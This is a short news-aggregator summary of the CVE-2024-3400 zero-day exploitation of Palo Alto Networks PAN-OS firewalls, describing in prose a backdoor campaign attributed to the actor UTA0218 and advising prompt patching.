"Palo Alto Networks Faces Zero-Day Backdoor Exploitation"

April 13, 2024 at 08:25 AM

•

1 min read

"Palo Alto Networks Faces Zero-Day Backdoor Exploitation" — Photo: The Hacker News

TL;DR Summary

Threat actors have been exploiting a zero-day vulnerability in Palo Alto Networks PAN-OS software to execute arbitrary code with root privileges on affected firewalls. The attack, known as Operation MidnightEclipse, involves the deployment of a Python-based backdoor to create a cron job that fetches and executes commands from an external server. The attackers have been observed creating a reverse shell, downloading additional tools, and exfiltrating data, prompting the U.S. Cybersecurity and Infrastructure Security Agency to add the flaw to its Known Exploited Vulnerabilities catalog. Organizations are advised to apply patches promptly, as the threat actor, dubbed UTA0218, is suspected to be state-backed and highly capable.

Topics:business #cve-2024-3400 #cybersecurity #palo-alto-networks #threat-actor #zero-day-attack

Share this article

Hackers Deploy Python Backdoor in Palo Alto Zero-Day Attack The Hacker News
“Highly capable” hackers root corporate networks by exploiting firewall 0-day Ars Technica
Palo Alto Networks firewalls under attack, hotfixes incoming! (CVE-2024-3400) Help Net Security
Palo Alto Networks Warns of Exploited Firewall Vulnerability SecurityWeek
Palo Alto Networks Discloses Exploitation Of 'Critical' Zero-Day Flaw Impacting PAN-OS CRN

Reading Insights

Total Reads

Unique Readers

Time Saved

3 min

vs 4 min read

Condensed

86%

746 → 105 words

Want the full story? Read the original article

Read on The Hacker News

JavaScript Required

tl;dr daily news requires JavaScript to be enabled. Please enable JavaScript in your browser settings.

Related Sources

Reading Insights